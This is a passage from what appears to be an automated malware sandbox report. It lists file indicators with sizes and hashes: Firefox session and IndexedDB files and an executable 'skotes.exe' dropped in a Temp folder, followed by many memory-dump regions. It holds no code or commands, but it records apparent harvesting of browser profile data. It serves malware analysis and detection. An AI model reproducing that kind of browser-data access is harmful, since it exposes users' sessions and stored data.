                      f3496f01baaeeb4fd6bad279fa3074d7258aa83f0c70d1541313958dd381ed17e4b4ec86b245ab1941b7e3625d391c277c4025fa7116566420414716a205b432

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\sessionstore-backups\recovery.jsonlz4

                      Filesize

                      4KB

                      MD5

                      dcbd0b3aad5d0ce2e5198fb59bcaa1f2

                      SHA1

                      a56543dc30d7296617cc40343909ba661fd3b35e

                      SHA256

                      2892c7f00fdb69549aa38dd89fa1799562bed6791fa95832c69e435255cb88a9

                      SHA512

                      5bb931e1aa065d228be11ff595a7cdc2b7854268098ddd6dbad8ece2cb68e800788c4d88b240ddb94fdc78e0262a60e77d57452e76d8921589b2055bb261e2e4

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                      Filesize

                      184KB

                      MD5

                      3dc733f51b6c47c0e57ae7035b9abacf

                      SHA1

                      d4c28a6f9d4bae9e297440a46726a2cb3e2504ba

                      SHA256

                      aafa700fb884f14becaf86a0eb9df79dfa15885b2ebe11cabe5f48a3a5d9e0e1

                      SHA512

                      e02670f6fa626a21ad150e0e0e589ba9f1f7a1fb921dc28f4117dc0a30a337b9c9b165dd0a30da864fe4dbdf130372e846648792a0bcf5aad4e8d28118101067

                    • \Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                      Filesize

                      3.1MB

                      MD5

                      22bf111e0ffbce40da98521c8ac390ac

                      SHA1

                      86c47f8fc939e81d7ceba37f1824e22ce4ef1f43

                      SHA256

                      0536c8987bbf4c736ee1ffaba0cb1e52d1652574fcb80ab14ff7d23a40e446b2

                      SHA512

                      a9d529513d988c20380432d0ce1f10b6286a949442f6964ba455d14f51d308810b495d6e04ec375c9a990230f04a1444e7a9647c205a38275aae08b34408d30e

                    • memory/408-395-0x0000000000A10000-0x0000000000CB4000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/408-164-0x0000000000A10000-0x0000000000CB4000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/408-165-0x0000000000A10000-0x0000000000CB4000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/408-162-0x0000000000A10000-0x0000000000CB4000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/408-384-0x0000000000A10000-0x0000000000CB4000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/584-119-0x0000000001110000-0x000000000179D000-memory.dmp

                      Filesize

                      6.6MB

                    • memory/584-117-0x0000000001110000-0x000000000179D000-memory.dmp

                      Filesize

                      6.6MB

                    • memory/772-98-0x0000000000120000-0x0000000000220000-memory.dmp

                      Filesize

                      1024KB

                    • memory/772-43-0x0000000000120000-0x0000000000220000-memory.dmp

                      Filesize

                      1024KB

                    • memory/824-0-0x0000000000DB0000-0x00000000010CD000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/824-3-0x0000000000DB0000-0x00000000010CD000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/824-1-0x0000000077CA0000-0x0000000077CA2000-memory.dmp

                      Filesize

                      8KB

                    • memory/824-17-0x00000000066A0000-0x00000000069BD000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/824-18-0x0000000000DB0000-0x00000000010CD000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/824-21-0x0000000000DB1000-0x0000000000E19000-memory.dmp

                      Filesize

                      416KB

                    • memory/824-19-0x00000000066A0000-0x00000000069BD000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/824-5-0x0000000000DB0000-0x00000000010CD000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/824-2-0x0000000000DB1000-0x0000000000E19000-memory.dmp

                      Filesize

                      416KB

                    • memory/1268-67-0x000000001B700000-0x000000001B9E2000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/1268-68-0x0000000001E70000-0x0000000001E78000-memory.dmp

                      Filesize

                      32KB

                    • memory/1652-75-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/1652-76-0x0000000001F40000-0x0000000001F48000-memory.dmp

                      Filesize

                      32KB

                    • memory/2232-94-0x0000000001380000-0x000000000181A000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2232-97-0x0000000001380000-0x000000000181A000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2940-129-0x0000000006860000-0x0000000006CFA000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2940-163-0x0000000006860000-0x0000000006EED000-memory.dmp

                      Filesize

                      6.6MB

                    • memory/2940-161-0x0000000006860000-0x0000000006B04000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/2940-160-0x0000000006860000-0x0000000006B04000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/2940-159-0x0000000006860000-0x0000000006EED000-memory.dmp

                      Filesize

                      6.6MB

                    • memory/2940-326-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-383-0x0000000006860000-0x0000000006B04000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/2940-135-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-382-0x0000000006860000-0x0000000006B04000-memory.dmp

                      Filesize

                      2.6MB

                    • memory/2940-115-0x0000000006860000-0x0000000006EED000-memory.dmp

                      Filesize

                      6.6MB

                    • memory/2940-399-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-116-0x0000000006860000-0x0000000006EED000-memory.dmp

                      Filesize

                      6.6MB

                    • memory/2940-405-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-93-0x0000000006860000-0x0000000006CFA000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/2940-78-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-77-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-79-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-66-0x00000000002D1000-0x0000000000339000-memory.dmp

                      Filesize

                      416KB

                    • memory/2940-44-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-42-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-26-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-24-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-23-0x00000000002D1000-0x0000000000339000-memory.dmp

                      Filesize

                      416KB

                    • memory/2940-22-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-488-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-490-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-495-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-502-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-503-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-504-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-505-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-506-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB

                    • memory/2940-507-0x00000000002D0000-0x00000000005ED000-memory.dmp

                      Filesize

                      3.1MB